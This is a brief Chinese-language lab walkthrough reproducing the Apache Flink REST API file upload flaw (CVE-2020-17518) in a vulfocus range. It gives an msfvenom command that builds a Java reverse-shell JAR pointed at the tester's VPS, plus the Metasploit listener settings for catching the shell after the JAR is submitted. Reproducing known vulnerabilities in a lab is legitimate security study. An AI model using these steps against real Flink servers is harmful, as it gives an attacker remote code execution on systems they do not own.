A25-1ApacheFlink-文件上传
漏洞描述:
Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致任意文件读取(CVE-2020-17519)和任意文件写入(CVE-2020-17518)漏洞。
CVE-2020-17518攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)。
CVE-2020-17519Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的)。
影响版本:
Apache:Apache Flink: 1.5.1 - 1.11.2
网站图片:
网络测绘:
使用vulfocus靶场进行复现
5、利用流程
1、生成恶意payload jar包(这里我们使用MSF渗透模块进行利用)
msfvenom -p java/shell_reverse_tcp lhost=vpsIP lport=空闲端口 -f jar >b.jar
2、访问靶场环境,将生成的payload文件下载到本地进行上传
3、MSF开启监听,等待shell反弹
msfconsole #启动msf
use exploit/multi/handler #使用漏洞利用模块
开启监听
set payload java/shell_reverse_tcp
set LHOST x.x.x.x #vps地址
set LPORT 6666 #空闲端口
exploit #或者run
4、点击submit ,getshell(靶场环境不稳定,试了好几遍)